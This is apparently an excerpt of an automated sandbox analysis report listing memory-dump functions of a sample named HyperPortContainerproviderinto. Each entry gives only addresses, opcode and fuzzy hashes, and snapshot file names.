                                                                          • Opcode ID: f1d7e96ae5916c8cf86265f745d5e61af155d6a6162bcfafb1e16e42894e698d
                                                                          • Instruction ID: 995bb165bbd71ea390a1fed3bf6ce13aa6c8dae8f30eac2dac0f3017a8d86d74
                                                                          • Opcode Fuzzy Hash: f1d7e96ae5916c8cf86265f745d5e61af155d6a6162bcfafb1e16e42894e698d
                                                                          • Instruction Fuzzy Hash: 08C04C05F5B51F01F43573EE54660ACB2425BD5F15FD70172D50C840E19CDD22D9017E
                                                                          Function 00007FFD9BAA06F8 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d7372259e0798134f4f56ddb0d96c50b690e24d3e987385c0a27220c80c1d790
                                                                          • Instruction ID: 611941d71fac2c39437956cfb75ef68a2f784ca9ea5a54835b96941d1a5a5d4a
                                                                          • Opcode Fuzzy Hash: d7372259e0798134f4f56ddb0d96c50b690e24d3e987385c0a27220c80c1d790
                                                                          • Instruction Fuzzy Hash: E0C08C3061180C8FC914EB2CC88480032A0FB09300BC20090E009C7170E25ADD80C780
                                                                          Function 00007FFD9BAA12B0 Relevance: .0, Instructions: 12COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c3c0a9bd9465e24915c510114d93ad08d10bb31644b8db93f59e31ae8850f7a
                                                                          • Instruction ID: c4f3a8234e2e850165ba8967af8cf3a1190937a1ea5cfb0b98a6d9510517fc96
                                                                          • Opcode Fuzzy Hash: 6c3c0a9bd9465e24915c510114d93ad08d10bb31644b8db93f59e31ae8850f7a
                                                                          • Instruction Fuzzy Hash: 81C08C3052180D8FC948EB28C89480433E0FB09204BC20090E008C7170E259DCC0CB40
                                                                          Function 00007FFD9BEA341B Relevance: .0, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a754784a609b870fb333525e0535b9e86b9334519277043c48f2679e8ecdd6a
                                                                          • Instruction ID: b52523d3e1b8da653a50e141aa6be385c2fa6b7ebc7350c205d8489609ab2fd5
                                                                          • Opcode Fuzzy Hash: 2a754784a609b870fb333525e0535b9e86b9334519277043c48f2679e8ecdd6a
                                                                          • Instruction Fuzzy Hash: 7CD0C990F0F68F85F23B86C1413123DA19C9F41B05EA2443ED09F42AE1CD1EB7016211
                                                                          Function 00007FFD9BAA4766 Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f078cdad36022c6596ffc1b59fa66e3116b38f008081f9f3fb941a71aa7fa7b
                                                                          • Instruction ID: 8fd15c8f01fc846b91af4f92f852a12efe29d18e0d614a62699175a07c3dcf21
                                                                          • Opcode Fuzzy Hash: 0f078cdad36022c6596ffc1b59fa66e3116b38f008081f9f3fb941a71aa7fa7b
                                                                          • Instruction Fuzzy Hash: 4BD01210A0E38A07FA70535058342B513224F52715F1201B699490B1F3DC691E454320
                                                                          Function 00007FFD9BAA3EC4 Relevance: .0, Instructions: 10COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16e3f3b47a4a9e16dcf5f35ca3878a5cd6e05adefe894bbf4bffcb6f734dc695
                                                                          • Instruction ID: 69f29b3b5a6efd1f74d8325eecd3cbe46aa416d7434cf150657af637380a8ef6
                                                                          • Opcode Fuzzy Hash: 16e3f3b47a4a9e16dcf5f35ca3878a5cd6e05adefe894bbf4bffcb6f734dc695
                                                                          • Instruction Fuzzy Hash: C9C08C02F0C82A42F36A221848606BD04024F5561CF484239E00DCB3CECE1C1A02028B
                                                                          Function 00007FFD9BEAC7FF Relevance: .0, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 03e860f034c7de761f564bdd946275a133b04c8f220cc0623ed42c5b3de42e74
                                                                          • Instruction ID: 4a47874ee7df640a1ce9d299e0c1ea01222c8307bb638ad4a6488b56ff9d3124
                                                                          • Opcode Fuzzy Hash: 03e860f034c7de761f564bdd946275a133b04c8f220cc0623ed42c5b3de42e74
                                                                          • Instruction Fuzzy Hash: C3C04C81F1E28656E73191E408A107D568C1B15244B560971D14A462F7DD4D6A455261
                                                                          Function 00007FFD9BEA7940 Relevance: .0, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4064f52ff31a23651c1c225c97c0c4ee1de6f5e3c3ff562d2a7c5392276146d
                                                                          • Instruction ID: a5931735f546dcdc6a007bc080c7ab455dc08ce2ed1d9d6f2330d7b700051650
                                                                          • Opcode Fuzzy Hash: b4064f52ff31a23651c1c225c97c0c4ee1de6f5e3c3ff562d2a7c5392276146d
                                                                          • Instruction Fuzzy Hash: B5B012A1F0E20B97F23080F804E407C938F0BA9244A131533C21B872E1DC9B2D861114
                                                                          Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a3d8a1e6b4b2f6f98430c5076e6cde03f8e771c8a844be9041264be44019bef
                                                                          • Instruction ID: 2f9a8d09e46e3a9968333eceeed997926630ebbf8b6b7a57d29132cb3a40fe25
                                                                          • Opcode Fuzzy Hash: 6a3d8a1e6b4b2f6f98430c5076e6cde03f8e771c8a844be9041264be44019bef
                                                                          • Instruction Fuzzy Hash: 3EB01200E5740F00E43433FA08920A870415B44200FC20070D40C8009198CD22980277
                                                                          Function 00007FFD9BEA2951 Relevance: .0, Instructions: 6COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1968807525.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9bea0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8188841fdf79791241f8b4b73bf16d0e2090e33b6ceb1bc8e8798bf27db64fe0
                                                                          • Instruction ID: e79f29b9e945194ad599e6844e0a5bbecc8820cdec623c6cbe6b631db28cc6fc
                                                                          • Opcode Fuzzy Hash: 8188841fdf79791241f8b4b73bf16d0e2090e33b6ceb1bc8e8798bf27db64fe0
                                                                          • Instruction Fuzzy Hash: 14B09240F0E20F83E23800F009A103C01881B06304B520634A11B6A1E2DC492A001250

                                                                          Non-executed Functions

                                                                          Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.1961172380.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_7ffd9baa0000_HyperPortContainerproviderinto.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c9$!k9$"s9$#{9
                                                                          • API String ID: 0-1692736845
                                                                          • Opcode ID: 45f74a789c8ad01ddbb1ac1f19652bf7ead88c27f78d8b3cd8945b0cdb8a7603
                                                                          • Instruction ID: 60e33aeeca87830bb377ab5c8fba241f52708b06b1ee2a6d8ad03dba32521d0d
                                                                          • Opcode Fuzzy Hash: 45f74a789c8ad01ddbb1ac1f19652bf7ead88c27f78d8b3cd8945b0cdb8a7603
                                                                          • Instruction Fuzzy Hash: B741DE17B0842745E23973FD78229ED6B448FA923FB0847B7F55E8D0C74D082486C2E9